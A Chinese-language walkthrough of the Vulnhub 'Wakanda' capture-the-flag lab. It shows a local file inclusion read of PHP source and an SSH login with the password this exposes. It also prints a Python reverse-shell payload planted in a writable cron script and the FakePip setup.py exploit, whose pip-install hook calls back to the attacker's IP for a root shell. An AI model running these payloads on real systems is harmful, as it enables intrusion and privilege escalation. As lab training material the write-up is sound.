Vulnhub靶機Wakanda滲透測試攻略
前言
Wakanda是一個新的交易市場網站,很快會上線了。你的目標是通過黑客技術找到“振金”的確切位置。
本vulnhub靶機環境由 ofollow,noindex" target="_blank">xMagass 開發,並託管於 Vulnhub ,這臺靶機上包含了很多很酷的技巧。
百度網盤下載地址:
連結: https://pan.baidu.com/s/1xwr1li8sJ-Yc7h_jOtVOcw 密碼:aixl
難度級別:中級。
用virtualbox匯入Wakanda_1.ova靶機環境,修改其網路連線方式為Bridged(橋接網絡卡),並選擇一個可用於聯網的網絡卡(例如,我使用的無線網絡卡上網,在圖中網絡卡為Inter(R) Dual Band Wireless-AC 7260)。
1、執行arp-scan識別目標的IP地址
由於kali和wakanda靶機都執行在橋接網絡卡模式下,因此處於同一個區域網內。我們可以先利用 ip a
命令檢視kali的IP地址,再使用netdiscover或arp-scan命令檢視同一個區域網的中另外還有哪些存活主機。
(1) 利用 ip a
命令檢視kali的IP地址
root@kali:~# ip a 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever 2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast state UP group default qlen 1000 link/ether 08:00:27:e2:40:00 brd ff:ff:ff:ff:ff:ff inet 192.168.0.104/24 brd 192.168.0.255 scope global dynamic eth0 valid_lft 5339sec preferred_lft 5339sec inet6 fe80::a00:27ff:fee2:4000/64 scope link valid_lft forever preferred_lft forever
從中可以看出,kali在網絡卡eth0上的IP地址和掩碼為 192.168.0.104/24
。
(2) 檢視同一個區域網的存活主機
root@kali:~# netdiscover -i eth0 Currently scanning: 192.168.10.0/16|Screen View: Unique Hosts 7 Captured ARP Req/Rep packets, from 5 hosts.Total size: 420 _____________________________________________________________________________ IPAt MAC AddressCountLenMAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.0.124:69:68:22:e8:1e3180TP-LINK TECHNOLOGIES CO.,LTD. 192.168.0.1036c:29:95:10:38:1c160Intel Corporate 192.168.0.10608:00:27:ac:03:43160PCS Systemtechnik GmbH 192.168.0.100bc:9f:ef:df:b6:e6160Unknown vendor 192.168.0.1022c:61:f6:88:ae:9c160Unknown vendor root@kali:~#
root@kali:~# arp-scan -l Interface: eth0, datalink type: EN10MB (Ethernet) Starting arp-scan 1.9 with 256 hosts (http://www.nta-monitor.com/tools/arp-scan/) 192.168.0.124:69:68:22:e8:1e(Unknown) 192.168.0.1036c:29:95:10:38:1cIntel Corporate 192.168.0.10608:00:27:ac:03:43CADMUS COMPUTER SYSTEMS 192.168.0.10144:c3:46:11:5b:07(Unknown) 192.168.0.100bc:9f:ef:df:b6:e6(Unknown) 8 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.9: 256 hosts scanned in 2.253 seconds (113.63 hosts/sec). 5 responded
從中可以看出,使用 CADMUS COMPUTER SYSTEMS
網絡卡的IP就是靶機(vulnhub靶機的網絡卡地址一般都是 CADMUS COMPUTER SYSTEMS
),其IP地址為192.168.0.106。
2、列舉和初步搜尋資訊
利用NMap執行全TCP埠掃描,我發現只有一個感興趣的web應用程式,該網站上聲明瞭這個即將開放的Vibranium交易市場。另外,還開放了一個執行在非預設埠上的的SSH服務(預設埠22、而此SSH服務執行在埠3333上)。
(1) nmap全埠掃描
root@kali:~# nmap -sS -p- 192.168.0.106 Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2018-09-20 09:56 CST Nmap scan report for localhost (192.168.0.106) Host is up (0.000096s latency). Not shown: 65531 closed ports PORTSTATE SERVICE 80/tcpopenhttp 111/tcpopenrpcbind 3333/tcpopendec-notes 59197/tcp openunknown MAC Address: 08:00:27:AC:03:43 (Oracle VirtualBox virtual NIC) Nmap done: 1 IP address (1 host up) scanned in 3.15 seconds
從nmap埠掃描結果來看,80埠上開放了一個WEB程式。3333埠上執行的是SSH服務。
(2) 使用Nikto掃描網站漏洞
root@kali:~# nikto -h http://192.168.0.106/ - Nikto v2.1.6 --------------------------------------------------------------------------- + Target IP:192.168.0.106 + Target Hostname:192.168.0.106 + Target Port:80 + Start Time:2018-09-20 09:12:14 (GMT8) --------------------------------------------------------------------------- + Server: Apache/2.4.10 (Debian) + The anti-clickjacking X-Frame-Options header is not present. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type + No CGI Directories found (use '-C all' to force check all possible dirs) + Apache/2.4.10 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current. + Web Server returns a valid response with junk HTTP methods, this may cause false positives. + Server leaks inodes via ETags, header found with file /icons/README, fields: 0x13f4 0x438c034968a80 + OSVDB-3233: /icons/README: Apache default file found. + 7535 requests: 0 error(s) and 7 item(s) reported on remote host + End Time:2018-09-20 09:13:28 (GMT8) (74 seconds) --------------------------------------------------------------------------- + 1 host(s) tested
從nikto掃描結果來看,並沒有任何可利用的漏洞、或資訊洩露。
(3) 目錄列舉
由於使用nikto沒有看到有用資訊,我們再嘗試使用dirb來暴力列舉目錄。國內可以使用御劍等工具,但是這是國外的靶機環境,建議都用kali的通用工具就好。
root@kali:~# dirb http://192.168.0.106/ ----------------- DIRB v2.22 By The Dark Raver ----------------- START_TIME: Thu Sep 20 09:19:02 2018 URL_BASE: http://192.168.0.106/ WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt ----------------- GENERATED WORDS: 4612 ---- Scanning URL: http://192.168.0.106/ ---- + http://192.168.0.106/admin (CODE:200|SIZE:0) + http://192.168.0.106/backup (CODE:200|SIZE:0) + http://192.168.0.106/index.php (CODE:200|SIZE:1527) + http://192.168.0.106/secret (CODE:200|SIZE:0) + http://192.168.0.106/server-status (CODE:403|SIZE:301) + http://192.168.0.106/shell (CODE:200|SIZE:0) ----------------- END_TIME: Thu Sep 20 09:19:05 2018 DOWNLOADED: 4612 - FOUND: 6
嘗試訪問 http://192.168.0.106/admin, backup, secret
等URL,都沒有返回任何資訊。
(4) 檢視網站原始碼
在網頁原始碼中,找到一條註釋,其中包含了有用的資訊:
<!-- <a class="nav-link active" href="?lang=fr">Fr/a> -->
在 ?lang=fr
中,lang表示可切換的網站語言(網站常常具支援多語言,例如英語、法語、中文等),fr表示法語。我們嘗試在HTTP URL中新增這個引數,切換語言為法語。
我們發現之前的英語內容切換成了法語:
原英語內容: Next opening of the largest vibranium market. The products come directly from the wakanda. stay tuned! 現法語內容: Prochaine ouverture du plus grand marché du vibranium. Les produits viennent directement du wakanda. Restez à l'écoute!
根據以往的滲透測試經驗,這裡很可能存在本地檔案包含(LFI)或遠端檔案包含(RFI)漏洞。
3、利用LFI讀取原始碼
在嘗試訪問 http://192.168.0.106/?lang=index
等url未獲得有用資訊後,我們嘗試php偽協議。 http://192.168.0.106/?lang=php://filter/convert.base64-encode/resource=index
得到了 index.php
的base64加密後的原始碼,解密後發現了一個Password。
PD9waHAKJHBhc3N3b3JkID0iTmlhbWV5NEV2ZXIyMjchISEiIDsvL0kgaGF2ZSB0byByZW1lbWJlciBpdAoKaWYgKGlzc2V0KCRfR0VUWydsYW5nJ10pKQp7CmluY2x1ZGUoJF9HRVRbJ2xhbmcnXS4iLnBocCIpOwp9Cgo/PgoKCgo8IURPQ1RZUEUgaHRtbD4KPGh0bWwgbGFuZz0iZW4iPjxoZWFkPgo8bWV0YSBodHRwLWVxdWl2PSJjb250ZW50LXR5cGUiIGNvbnRlbnQ9InRleHQvaHRtbDsgY2hhcnNldD1VVEYtOCI+CiAgICA8bWV0YSBjaGFyc2V0PSJ1dGYtOCI+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEsIHNocmluay10by1maXQ9bm8iPgogICAgPG1ldGEgbmFtZT0iZGVzY3JpcHRpb24iIGNvbnRlbnQ9IlZpYnJhbml1bSBtYXJrZXQiPgogICAgPG1ldGEgbmFtZT0iYXV0aG9yIiBjb250ZW50PSJtYW1hZG91Ij4KCiAgICA8dGl0bGU+VmlicmFuaXVtIE1hcmtldDwvdGl0bGU+CgoKICAgIDxsaW5rIGhyZWY9ImJvb3RzdHJhcC5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CgogICAgCiAgICA8bGluayBocmVmPSJjb3Zlci5jc3MiIHJlbD0ic3R5bGVzaGVldCI+CiAgPC9oZWFkPgoKICA8Ym9keSBjbGFzcz0idGV4dC1jZW50ZXIiPgoKICAgIDxkaXYgY2xhc3M9ImNvdmVyLWNvbnRhaW5lciBkLWZsZXggdy0xMDAgaC0xMDAgcC0zIG14LWF1dG8gZmxleC1jb2x1bW4iPgogICAgICA8aGVhZGVyIGNsYXNzPSJtYXN0aGVhZCBtYi1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8aDMgY2xhc3M9Im1hc3RoZWFkLWJyYW5kIj5WaWJyYW5pdW0gTWFya2V0PC9oMz4KICAgICAgICAgIDxuYXYgY2xhc3M9Im5hdiBuYXYtbWFzdGhlYWQganVzdGlmeS1jb250ZW50LWNlbnRlciI+CiAgICAgICAgICAgIDxhIGNsYXNzPSJuYXYtbGluayBhY3RpdmUiIGhyZWY9IiMiPkhvbWU8L2E+CiAgICAgICAgICAgIDwhLS0gPGEgY2xhc3M9Im5hdi1saW5rIGFjdGl2ZSIgaHJlZj0iP2xhbmc9ZnIiPkZyL2E+IC0tPgogICAgICAgICAgPC9uYXY+CiAgICAgICAgPC9kaXY+CiAgICAgIDwvaGVhZGVyPgoKICAgICAgPG1haW4gcm9sZT0ibWFpbiIgY2xhc3M9ImlubmVyIGNvdmVyIj4KICAgICAgICA8aDEgY2xhc3M9ImNvdmVyLWhlYWRpbmciPkNvbWluZyBzb29uPC9oMT4KICAgICAgICA8cCBjbGFzcz0ibGVhZCI+CiAgICAgICAgICA8P3BocAogICAgICAgICAgICBpZiAoaXNzZXQoJF9HRVRbJ2xhbmcnXSkpCiAgICAgICAgICB7CiAgICAgICAgICBlY2hvICRtZXNzYWdlOwogICAgICAgICAgfQogICAgICAgICAgZWxzZQogICAgICAgICAgewogICAgICAgICAgICA/PgoKICAgICAgICAgICAgTmV4dCBvcGVuaW5nIG9mIHRoZSBsYXJnZXN0IHZpYnJhbml1bSBtYXJrZXQuIFRoZSBwcm9kdWN0cyBjb21lIGRpcmVjdGx5IGZyb20gdGhlIHdha2FuZGEuIHN0YXkgdHVuZWQhCiAgICAgICAgICAgIDw/cGhwCiAgICAgICAgICB9Cj8+CiAgICAgICAgPC9wPgogICAgICAgIDxwIGNsYXNzPSJsZWFkIj4KICAgICAgICAgIDxhIGhyZWY9IiMiIGNsYXNzPSJidG4gYnRuLWxnIGJ0bi1zZWNvbmRhcnkiPkxlYXJuIG1vcmU8L2E+CiAgICAgICAgPC9wPgogICAgICA8L21haW4+CgogICAgICA8Zm9vdGVyIGNsYXNzPSJtYXN0Zm9vdCBtdC1hdXRvIj4KICAgICAgICA8ZGl2IGNsYXNzPSJpbm5lciI+CiAgICAgICAgICA8cD5NYWRlIGJ5PGEgaHJlZj0iIyI+QG1hbWFkb3U8L2E+PC9wPgogICAgICAgIDwvZGl2PgogICAgICA8L2Zvb3Rlcj4KICAgIDwvZGl2PgoKCgogIAoKPC9ib2R5PjwvaHRtbD4=<?php $password ="Niamey4Ever227!!!" ;//I have to remember it if (isset($_GET['lang'])) { include($_GET['lang'].".php"); }
由於網站沒有登入後臺,我們嘗試利用這個密碼登入SSH服務。在嘗試使用者名稱root、admin等無效後,我們發現網站下文的資訊 Made by@mamadou
,於是嘗試使用者名稱 mamadou
。
root@kali:~# ssh [email protected] -p 3333 The authenticity of host '[192.168.0.106]:3333 ([192.168.0.106]:3333)' can't be established. ECDSA key fingerprint is SHA256:X+fXjgH34Ta5l6I4kUSpiVZNBGGBGtjxZxgyU7KCFwk. Are you sure you want to continue connecting (yes/no)? yes Warning: Permanently added '[192.168.0.106]:3333' (ECDSA) to the list of known hosts. [email protected]'s password: The programs included with the Debian GNU/Linux system are free software; the exact distribution terms for each program are described in the individual files in /usr/share/doc/*/copyright. Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent permitted by applicable law. Last login: Wed Sep 19 06:26:23 2018 from kali Python 2.7.9 (default, Jun 29 2016, 13:08:31) [GCC 4.9.2] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> ls Traceback (most recent call last): File "<stdin>", line 1, in <module> NameError: name 'ls' is not defined >>>
4、獲得敏感資訊
(1)切換BASH環境
登入後,發現mamadou使用的shell不是/bin/bash,而是python。
我們可以執行python命令來獲得靶機上的敏感資訊。也可以利用python語句切換到 /bin/bash
。
>>> import pty >>> pty.spawn("/bin/bash") mamadou@Wakanda1:~$ id uid=1000(mamadou) gid=1000(mamadou) groups=1000(mamadou) mamadou@Wakanda1:~$
利用上面的 import pty
、 pty.spawn("/bin/bash")
兩條命令,即可切換到bash下。
(2)獲得第一個flag
在mamadou的使用者目錄下,找到了第一個flag。
mamadou@Wakanda1:~$ pwd /home/mamadou mamadou@Wakanda1:~$ ls -lar total 24 -rw-r--r-- 1 mamadou mamadou675 Aug1 13:15 .profile -rw-r--r-- 1 mamadou mamadou41 Aug1 15:52 flag1.txt -rw-r--r-- 1 mamadou mamadou 3515 Aug1 13:15 .bashrc -rw-r--r-- 1 mamadou mamadou220 Aug1 13:15 .bash_logout lrwxrwxrwx 1 rootroot9 Aug5 02:24 .bash_history -> /dev/null drwxr-xr-x 4 rootroot4096 Aug1 15:23 .. drwxr-xr-x 2 mamadou mamadou 4096 Sep 19 06:28 . mamadou@Wakanda1:~$ cat flag1.txt Flag : d86b9ad71ca887f4dd1dac86ba1c4dfc
另外,我們再搜尋其他目錄,檢視是否有flag。
mamadou@Wakanda1:~$ find / --name "*flag*" 2>/dev/null
沒有發現flag檔案,可能是mamadou無權訪問。
在網站目錄 /var/www/html
下,也未找到有用的資訊。
mamadou@Wakanda1:~$ cd /var/www/html/ mamadou@Wakanda1:/var/www/html$ ls -la total 4572 drwxr-xr-x 2 root root4096 Aug1 16:51 . drwxr-xr-x 3 root root4096 Aug1 13:29 .. -rw-r--r-- 1 root root0 Aug1 16:50 admin -rw-r--r-- 1 root root0 Aug1 16:50 backup -rw-r--r-- 1 root root 4510077 Aug1 14:26 bg.jpg -rw-r--r-- 1 root root140936 Aug1 14:07 bootstrap.css -rw-r--r-- 1 root root1464 Aug1 14:29 cover.css -rw-r--r-- 1 root root141 Aug1 16:45 fr.php -rw-r--r-- 1 root root0 Aug1 16:50 hahaha -rw-r--r-- 1 root root0 Aug1 16:51 hohoho -rw-r--r-- 1 root root1811 Aug1 16:44 index.php -rw-r--r-- 1 root root0 Aug1 16:50 secret -rw-r--r-- 1 root root40 Aug1 16:51 secret.txt -rw-r--r-- 1 root root0 Aug1 16:50 shell -rw-r--r-- 1 root root0 Aug1 16:50 troll mamadou@Wakanda1:/var/www/html$ cat secret.txt Congratulations! Nope!I am joking....
這裡可以看到,dirb掃描出的admin等欺騙性檔案的大小都為0,沒有任何內容。
(3)檢視使用者是否有sudo許可權
mamadou@Wakanda1:~$ sudo -l [sudo] password for mamadou: Sorry, user mamadou may not run sudo on Wakanda1.
發現mamadou使用者沒有sudo許可權。
5、利用其他使用者的許可權
(1) 檢視其他使用者
這時,我們再檢視靶機上是否有其他使用者。
mamadou@Wakanda1:~$ cat /etc/passwd root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false Debian-exim:x:104:109::/var/spool/exim4:/bin/false messagebus:x:105:110::/var/run/dbus:/bin/false statd:x:106:65534::/var/lib/nfs:/bin/false avahi-autoipd:x:107:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false sshd:x:108:65534::/var/run/sshd:/usr/sbin/nologin mamadou:x:1000:1000:Mamadou,,,,Developper:/home/mamadou:/usr/bin/python devops:x:1001:1002:,,,:/home/devops:/bin/bash
從中發現另一個devops使用者。我們再搜尋他是否有敏感資訊:
mamadou@Wakanda1:~$ cd /home/devops/ mamadou@Wakanda1:/home/devops$ ls -la total 28 drwxr-xr-x 3 devops developer 4096 Sep 19 06:50 . drwxr-xr-x 4 rootroot4096 Aug1 15:23 .. lrwxrwxrwx 1 rootroot9 Aug5 02:25 .bash_history -> /dev/null -rw-r--r-- 1 devops developer220 Aug1 15:23 .bash_logout -rw-r--r-- 1 devops developer 3515 Aug1 15:23 .bashrc -rw-r----- 1 devops developer42 Aug1 15:57 flag2.txt -rw-r--r-- 1 devops developer675 Aug1 15:23 .profile mamadou@Wakanda1:/home/devops$ cat flag2.txt cat: flag2.txt: Permission denied
發現了一個flag2.txt,但是mamadou沒許可權檢視其內容。於是嘗試切換到該使用者。沒有密碼,只能想其他方法。
(2)資訊搜尋
在/tmp目錄中,發現一個新建的test檔案:
mamadou@Wakanda1:~$ cd /tmp mamadou@Wakanda1:/tmp$ ls -laR .: total 32 drwxrwxrwt7 rootroot4096 Sep 19 21:42 . drwxr-xr-x 22 rootroot4096 Aug1 13:05 .. drwxrwxrwt2 rootroot4096 Sep 19 20:49 .font-unix drwxrwxrwt2 rootroot4096 Sep 19 20:49 .ICE-unix -rw-r--r--1 devops developer4 Sep 19 21:46 test drwxrwxrwt2 rootroot4096 Sep 19 20:49 .Test-unix drwxrwxrwt2 rootroot4096 Sep 19 20:49 .X11-unix drwxrwxrwt2 rootroot4096 Sep 19 20:49 .XIM-unix mamadou@Wakanda1:/tmp$ date Wed Sep 19 21:47:59 EDT 2018
test檔案的建立時間為 Sep 19 21:46
,明顯晚於其他檔案的建立日期;使用date命令檢視靶機的當前時間,為 Wed Sep 19 21:47:59
,說明test檔案是2分鐘內才新建的。我們懷疑靶機上運行了一個程式,定期執行建立test檔案。
最終,在 /srv
目錄下,找到了這個定期執行的檔案:
mamadou@Wakanda1:/tmp$ cd /srv/ mamadou@Wakanda1:/srv$ ls -la total 12 drwxr-xr-x2 rootroot4096 Aug1 17:52 . drwxr-xr-x 22 rootroot4096 Aug1 13:05 .. -rw-r--rw-1 devops developer37 Sep 19 21:49 .antivirus.py mamadou@Wakanda1:/srv$ cat .antivirus.py open('/tmp/test','w').write('test')
檔案 .antivirus.py
是一個python指令碼,其擁有者是devops,所屬組為developer,而且任何人都可以修改它!
我們可以通過修改其檔案內容,嘗試獲得反向shell。
建立反向shell
修改python指令碼,新增反向shell的內容:
mamadou@Wakanda1:/srv$ vi .antivirus.py mamadou@Wakanda1:/srv$ cat .antivirus.py open('/tmp/test','w').write('test') import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.0.104",1235)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/bash","-i"])
修改完成後,我們偵聽1235埠,等待靶機的反向shell連線:
root@kali:~# nc -lvvp 1235
在等了幾分鐘後,成功獲得了shell連線。並獲得了第二個flag。
root@kali:~# nc -lvvp 1235 listening on [any] 1235 ... connect to [192.168.0.104] from localhost [192.168.0.106] 60823 bash: cannot set terminal process group (1107): Inappropriate ioctl for device bash: no job control in this shell devops@Wakanda1:/$ id uid=1001(devops) gid=1002(developer) groups=1002(developer) devops@Wakanda1:/$ cd devops@Wakanda1:~$ pwd /home/devops devops@Wakanda1:~$ ls -la total 28 drwxr-xr-x 3 devops developer 4096 Sep 19 06:50 . drwxr-xr-x 4 rootroot4096 Aug1 15:23 .. lrwxrwxrwx 1 rootroot9 Aug5 02:25 .bash_history -> /dev/null -rw-r--r-- 1 devops developer220 Aug1 15:23 .bash_logout -rw-r--r-- 1 devops developer 3515 Aug1 15:23 .bashrc -rw-r----- 1 devops developer42 Aug1 15:57 flag2.txt -rw-r--r-- 1 devops developer675 Aug1 15:23 .profile devops@Wakanda1:~$ cat flag2.txt Flag 2 : d8ce56398c88e1b4d9e5f83e64c79098
6、提權到root
我們的最終目標是獲得root許可權。
(1)檢視使用者devops的sudo許可權
devops@Wakanda1:/$ sudo -l sudo -l Matching Defaults entries for devops on Wakanda1: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin User devops may run the following commands on Wakanda1: (ALL) NOPASSWD: /usr/bin/pip
發現使用者devops可無密碼執行的sudo命令只有/usr/bin/pip。從來沒有遇到這種情況,在網上搜索了好久,找到一種提權方法: fakepip exploit 。具體的漏洞利用方法已寫得很清楚。
(2)利用pip升級漏洞
由於在靶機上無法高效地編輯exp,我們先在kali上將exp下載下來,再編輯,最後上傳到靶機上。
A.下載
root@kali:~# mkdir FakePip root@kali:~# cd FakePip/ root@kali:~/FakePip# wget https://raw.githubusercontent.com/0x00-0x00/FakePip/master/setup.py --2018-09-20 10:30:04--https://raw.githubusercontent.com/0x00-0x00/FakePip/master/setup.py Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 151.101.108.133 Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|151.101.108.133|:443... connected. HTTP request sent, awaiting response... 200 OK Length: 983 [text/plain] Saving to: ?.etup.py? setup.py100%[============================>]983--.-KB/sin 0s 2018-09-20 10:30:05 (4.20 MB/s) - ?.etup.py?.saved [983/983]
B.修改反彈地址
修改 setup.py
中的 RHOST = '10.0.0.1' # change this
語句為kali的IP地址。例如,我的kali的IP地址為: 192.168.0.104
。
root@kali:~/FakePip# vi setup.py root@kali:~/FakePip# cat setup.py from setuptools import setup from setuptools.command.install import install import base64 import os class CustomInstall(install): def run(self): install.run(self) RHOST = '192.168.0.104'# change this reverse_shell = 'python -c "import os; import pty; import socket; lhost = \'%s\'; lport = 443; s = socket.socket(socket.AF_INET, socket.SOCK_STREAM); s.connect((lhost, lport)); os.dup2(s.fileno(), 0); os.dup2(s.fileno(), 1); os.dup2(s.fileno(), 2); os.putenv(\'HISTFILE\', \'/dev/null\'); pty.spawn(\'/bin/bash\'); s.close();"' % RHOST encoded = base64.b64encode(reverse_shell) os.system('echo %s|base64 -d|bash' % encoded) setup(name='FakePip', version='0.0.1', description='This will exploit a sudoer able to /usr/bin/pip install *', url='https://github.com/0x00-0x00/fakepip', author='zc00l', author_email='[email protected]', license='MIT', zip_safe=False, cmdclass={'install': CustomInstall})
C.利用python建立SimpleHTTPServer
root@kali:~/FakePip# python -m SimpleHTTPServer 8888 Serving HTTP on 0.0.0.0 port 8888 ...
執行 python -m SimpleHTTPServer 8888
後,就在KALI上運行了一個簡易的HTTP伺服器,在靶機上就可從這個HTTP伺服器下載setup.py指令碼了。
D.下載exp
在靶機的devops使用者下,下載setup.py指令碼。
devops@Wakanda1:~$ mkdir fakepip devops@Wakanda1:~$ cd fakepip devops@Wakanda1:~/fakepip$ wget http://192.168.0.104:8888/setup.py --2018-09-19 22:34:45--http://192.168.0.104:8888/setup.py Connecting to 192.168.0.104:8888... connected. HTTP request sent, awaiting response... 200 OK Length: 988 [text/plain] Saving to: ?.etup.py? 0K100%127M=0s 2018-09-19 22:34:45 (127 MB/s) - ?.etup.py?.saved [988/988] devops@Wakanda1:~/fakepip$ ls setup.py
可以看到,成功地下載了指令碼。
E.在kali中偵聽443埠
root@kali:~/FakePip# nc -lvvp 443
F.執行exp,獲得反向shell
在靶機上執行命令 sudo /usr/bin/pip install . --upgrade --force-reinstall
,即可在kali上發現,成功獲得了反向shell。
devops@Wakanda1:~/fakepip$ sudo /usr/bin/pip install . --upgrade --force-reinstall <sudo /usr/bin/pip install . --upgrade --force-reinstall Unpacking /home/devops/fakepip Running setup.py (path:/tmp/pip-G7z4Td-build/setup.py) egg_info for package from file:///home/devops/fakepip Installing collected packages: FakePip Found existing installation: FakePip 0.0.1 Uninstalling FakePip: Successfully uninstalled FakePip Running setup.py install for FakePip
在kali上的反向shell許可權是root,即最高許可權。
root@kali:~/FakePip# nc -lvvp 443 listening on [any] 443 ... connect to [192.168.0.104] from localhost [192.168.0.106] 55143 root@Wakanda1:/tmp/pip-G7z4Td-build# id uid=0(root) gid=0(root) groups=0(root) root@Wakanda1:/tmp/pip-G7z4Td-build#
7、檢視最終flag
root@Wakanda1:/tmp/pip-G7z4Td-build# cd cd root@Wakanda1:~# ls -la ls -la total 20 drwx------2 root root 4096 Aug5 02:26 . drwxr-xr-x 22 root root 4096 Aug1 13:05 .. -rw-r--r--1 root root570 Jan 312010 .bashrc -rw-r--r--1 root root140 Nov 192007 .profile -rw-r-----1 root root429 Aug1 15:16 root.txt root@Wakanda1:~# cat root.txt cat root.txt __.--.____.--._ ( )=.-":;:;:;;':;:;:;"-._ \\\:;:;:;:;:;;:;::;:;:;:\ \\\:;:;:;:;:;;:;:;:;:;:;\ \\\:;::;:;:;:;:;::;:;:;:\ \\\:;:;:;:;:;;:;::;:;:;:\ \\\:;::;:;:;:;:;::;:;:;:\ \\\;;:;:_:--:_:_:--:_;:;\ \\\_.-""-._\ \\ \\ \\ \\ Wakanda 1 - by @xMagass \\ \\ Congratulations You are Root! 821ae63dbe0c573eff8b69d451fb21bc
*本文作者:laffray,轉載請註明來自FreeBuf.COM